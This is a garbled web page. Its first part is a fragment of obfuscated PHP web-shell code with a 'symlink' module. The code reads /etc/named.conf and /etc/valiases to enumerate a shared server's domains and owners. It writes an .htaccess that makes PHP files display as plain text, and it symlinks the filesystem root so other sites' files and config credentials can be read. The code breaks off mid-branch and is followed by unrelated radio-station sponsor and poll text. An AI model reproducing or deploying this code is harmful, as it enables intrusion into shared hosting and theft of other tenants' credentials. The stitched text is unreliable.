onclick="g(\'symlink\',null,\'website\',null)">| Domains | onclick="g(\'symlink\',null,null,\'whole\')">| Whole Server Symlink | onclick="g(\'symlink\',null,null,null,\'config\')">| Config PHP symlink |

';

if(isset($_POST['p1']) && $_POST['p1']=='website')
{
echo "
";
$d0mains = @file("/etc/named.conf");
if(!$d0mains){ echo "
Cant access this file on server -> [ /etc/named.conf ]
"; }



echo "

";
$count=1;
foreach($d0mains as $d0main){

if(@eregi("zone",$d0main)){

preg_match_all('zone "(.*)"', $d0main, $domains);

flush();

if(strlen(trim($domains[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));

echo ""; flush();
$count++;
}}}
echo "
Countdomainsusers
".$count."".$domains[1][0]."".$user['name']."
";
}

if(isset($_POST['p2']) && $_POST['p2']=='whole')
{


@set_time_limit(0);

echo "
";



@mkdir('sym',0777);
$IIIIIIIIIIl1 = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$IIIIIIIIII1I =@fopen ('sym/.htaccess','w');
fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1);
@symlink('/','sym/root');
$IIIIIIIIIlIl = basename('_FILE_');


$IIIIIIIIIllI = @file('/etc/named.conf');
if(!$IIIIIIIIIllI)
{
echo "
 Cant access this file on server -> [ /etc/named.conf ]
";
}
else
{
echo "";
foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
if(@eregi('zone',$IIIIIIIIIll1)){
preg_match_all('zone "(.*)"',$IIIIIIIIIll1,$IIIIIIIIIl11);
flush();
if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
$IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
$IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
@symlink('/','sym/root');
$IIIIIIII1I1l = $IIIIIIIIIl11[1][0];
$IIIIIIII1I11 = '\.ir';
$IIIIIIII1lII = '\.il';
if (@eregi("$IIIIIIII1I11",$IIIIIIIIIl11[1][0]) or @eregi("$IIIIIIII1lII",$IIIIIIIIIl11[1][0]) )
{
$IIIIIIII1I1l = "
".$IIIIIIIIIl11[1][0].'
';
}
echo "









";
flush();
}
}
}
}

echo "
DomainsUserssymlink

'.$IIIIIIII1I1l.'

'.$IIIIIIIII1I1['name']."

symlink
";

}



if(isset($_POST['p3']) && $_POST['p3']=='config')

Suncrest Home Health
Foster & Foster Realty and AuctionHigh Funeral HomeCiphertek SystemsRoberts NissanJohn Roberts ToyotaCiphertek Systems, LLC

Five O'Clock Flashback

Five O'Clock Flashback

STAR 107 FM Poll

What will you be doing for this Halloween?





Vote Now!

View Results

Peg Broadcasting, LLC is...

1230 WAKI Sports Radio960 WBMC105.3 WOW CountrySTAR 107 FM